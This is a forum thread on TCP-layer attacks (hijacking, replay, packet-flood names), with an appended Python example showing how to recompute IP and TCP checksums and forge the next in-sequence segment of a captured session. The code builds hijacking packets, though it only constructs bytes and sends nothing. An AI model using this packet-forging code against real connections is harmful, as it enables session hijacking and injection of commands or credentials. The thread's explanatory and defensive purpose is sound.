What are possible TCP layer attacks?

TCP uses a checksum over the data and the header. Then how can an adversary modify a packet and send it on to its intended destination?
For IP, an adversary can change values in the IP header, rebuild the checksum field and fill it into the IP header, but what about the TCP checksum and data?
Does that mean there is no TCP data hacking/modifying attack in the world?
Which TCP layer attacks are there in the world except the SYN attack?
DonConsolio commented:
For a nice overview of some TCP attacks, read "TCP Exploits" by Prabhaker Mateti at:
David Piniella commented:
>> Which TCP layer attacks are there in the world except the SYN attack?

smurf, bonk, boink, ping of death, teardrop, fraggle, hijacking, DDoS.

TCP checksums are not meant as protection against attacks,
but as protection against bad comm lines, modems, etc.

The algorithm is simple and well documented, so
it is no problem to modify any intercepted packet, then recalculate
the checksum and send the packet to the victim.
macker commented:
In order to hijack a TCP connection, two things need to be accomplished:

1) You need to be able to use the correct TCP sequence number for the next packet, and then send this packet with the correct source address.
The connection is now hijacked; the client's TCP sequence number is out of sequence, so their session is no longer valid, and packets from them will be ignored. Unless you are a man-in-the-middle, or otherwise able to intercept replies, this will be a blind attack, and probably most suited to TCP replay attacks.

2) Now that you've hijacked the connection and are able to send new packets of data to the remote host using the correct sequence numbers, which will continue to increment, you need to preserve the session so that it continues. The original (victim) host will continue to receive packets from the destination, in reply to your forged packets... when it sees these, but has already invalidated the session (sequence numbers no longer matching and all), RST packets are going to be sent back and forth, and possibly ICMP Port Unreachable messages as well. You'll need to suppress any network output from the originating host to prevent the original (victim) host from sending these packets, which could cause the hijacked session to terminate.

TCP replay attacks are the second type of attack that seems to meet your qualifications. In short, if you've already captured a session in the past, you can resend the packets to the destination host. Again, this is a blind attack (unless playing man-in-the-middle), and would be for purposes such as activating an authentication mechanism. E.g. if a remote host allows SMTP traffic after you've authenticated via POP, a TCP replay attack could be used to resend the packets to authenticate the POP session, thus opening up the SMTP service. This is a hypothetical example, and ignores the fact that extracting the POP password from the already-known traffic would be easier.

In both cases, network connections should be secured from monitoring and man-in-the-middle attacks. SSH tunneling, IPSec and other VPN-type links can be used with great benefit. Services should have protocol-layer mechanisms to establish per-session cryptography, tokens, timestamps, etc. to prevent replay attacks and to prevent hijacking.

Other attacks typically involve sending unexpected data to a remote host for the purposes of buffer overflows and various DoS purposes. This can be in the form of oversized packets, unexpected contents, manipulation of packet flags, etc. This is usually at the protocol level, but can sometimes be a low-level packet issue that exploits issues in the TCP stack. E.g. the "ssping" or "jolt" attack was an oversized ICMP Echo (Ping) packet.
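The following is an added example, not code posted by anyone in this thread. It demonstrates both of the points made above in working code: David Piniella's point that the TCP and IP checksums are trivial to recompute after modifying an intercepted packet (so the checksum protects against line noise, not against an attacker), and macker's first step of hijacking, namely building the next segment with the correct sequence number and source address. The addresses, ports, sequence numbers and packet bytes are all constructed for the example; the POP3 USER/PASS payloads are just illustrative data.

```python
"""Added example (not from the original thread): recompute IPv4 and TCP
checksums after modifying a captured segment, and build the next
in-sequence segment as a blind hijacker would. Standard library only.
"""
import struct

TCP_PROTO = 6


def ones_complement_sum(data: bytes) -> int:
    """RFC 1071 one's-complement sum of 16-bit words (odd trailing byte zero-padded)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum((data[i] << 8) | data[i + 1] for i in range(0, len(data), 2))
    while total >> 16:  # fold carries back in
        total = (total & 0xFFFF) + (total >> 16)
    return total


def ip_checksum(ip_header: bytes) -> int:
    """Checksum over the IPv4 header with its checksum field (bytes 10-11) zeroed."""
    hdr = ip_header[:10] + b"\x00\x00" + ip_header[12:]
    return (~ones_complement_sum(hdr)) & 0xFFFF


def tcp_checksum(src: bytes, dst: bytes, segment: bytes) -> int:
    """Checksum over pseudo-header (src, dst, zero, proto, TCP length) plus the
    segment with its checksum field (bytes 16-17) zeroed. TCP sends 0xFFFF for 0."""
    pseudo = src + dst + struct.pack("!BBH", 0, TCP_PROTO, len(segment))
    seg = segment[:16] + b"\x00\x00" + segment[18:]
    return ((~ones_complement_sum(pseudo + seg)) & 0xFFFF) or 0xFFFF


def ip_valid(ip_header: bytes) -> bool:
    """Receiver-side check: the sum including the stored checksum folds to 0xFFFF."""
    return ones_complement_sum(ip_header) == 0xFFFF


def tcp_valid(src: bytes, dst: bytes, segment: bytes) -> bool:
    pseudo = src + dst + struct.pack("!BBH", 0, TCP_PROTO, len(segment))
    return ones_complement_sum(pseudo + segment) == 0xFFFF


def build_ipv4(src: bytes, dst: bytes, payload_len: int, ident: int = 0x1234, ttl: int = 64) -> bytes:
    # version/IHL, TOS, total length, ID, flags (DF), TTL, protocol, checksum, src, dst
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + payload_len, ident, 0x4000, ttl, TCP_PROTO, 0, src, dst)
    return hdr[:10] + struct.pack("!H", ip_checksum(hdr)) + hdr[12:]


def build_tcp(src, dst, sport, dport, seq, ack, flags, payload, window=65535) -> bytes:
    # 20-byte header (data offset 5), no options; checksum filled in afterwards
    hdr = struct.pack("!HHIIBBHHH", sport, dport, seq, ack, 5 << 4, flags, window, 0, 0)
    seg = hdr + payload
    return seg[:16] + struct.pack("!H", tcp_checksum(src, dst, seg)) + seg[18:]


def parse(packet: bytes) -> dict:
    """Pull out the fields a hijacker needs, and whether both checksums verify."""
    ihl = (packet[0] & 0x0F) * 4
    total_len = struct.unpack("!H", packet[2:4])[0]
    src, dst = packet[12:16], packet[16:20]
    tcp = packet[ihl:total_len]
    sport, dport, seq, ack, off, flags, _win, _csum, _urg = struct.unpack("!HHIIBBHHH", tcp[:20])
    return {
        "src": src, "dst": dst, "sport": sport, "dport": dport,
        "seq": seq, "ack": ack, "flags": flags, "payload": tcp[(off >> 4) * 4:],
        "ip_ok": ip_valid(packet[:ihl]), "tcp_ok": tcp_valid(src, dst, tcp),
    }


def tamper_without_recalc(packet: bytes, offset: int) -> bytes:
    """Flip one byte and leave the checksums alone: the receiver will drop it."""
    b = bytearray(packet)
    b[offset] ^= 0xFF
    return bytes(b)


def forge_next_segment(captured: bytes, new_payload: bytes) -> bytes:
    """The segment an attacker injects next in the same direction as `captured`:
    same addresses and ports, seq advanced by the captured payload length
    (SYN and FIN each also consume one), ack unchanged, PSH|ACK, checksums redone."""
    f = parse(captured)
    syn, fin = (f["flags"] >> 1) & 1, f["flags"] & 1
    next_seq = (f["seq"] + len(f["payload"]) + syn + fin) & 0xFFFFFFFF
    tcp = build_tcp(f["src"], f["dst"], f["sport"], f["dport"], next_seq, f["ack"], 0x18, new_payload)
    return build_ipv4(f["src"], f["dst"], len(tcp)) + tcp


# Constructed sample: a client segment (seq 1000, ack 5000) carrying a POP3 USER command.
CLIENT, SERVER = bytes([10, 0, 0, 5]), bytes([10, 0, 0, 25])
_tcp = build_tcp(CLIENT, SERVER, 40000, 110, 1000, 5000, 0x18, b"USER alice\r\n")
CAPTURED = build_ipv4(CLIENT, SERVER, len(_tcp)) + _tcp

if __name__ == "__main__":
    print("captured:", parse(CAPTURED))
    print("tampered without recalc, tcp_ok =", parse(tamper_without_recalc(CAPTURED, 40))["tcp_ok"])
    print("forged next segment:", parse(forge_next_segment(CAPTURED, b"PASS hunter2\r\n")))
```

Run as-is to see all three cases: the captured packet verifies, a byte flipped at offset 40 (first payload byte) without recomputation fails the TCP check, and the forged PASS segment carries seq 1012 (1000 plus the 12-byte USER payload) with both checksums valid. Note that the checksum recomputation is the easy half of the attack; what macker describes in step 2, keeping the real client from sending RSTs once its numbers fall out of sync, is the part that needs either a man-in-the-middle position or a way to silence the victim.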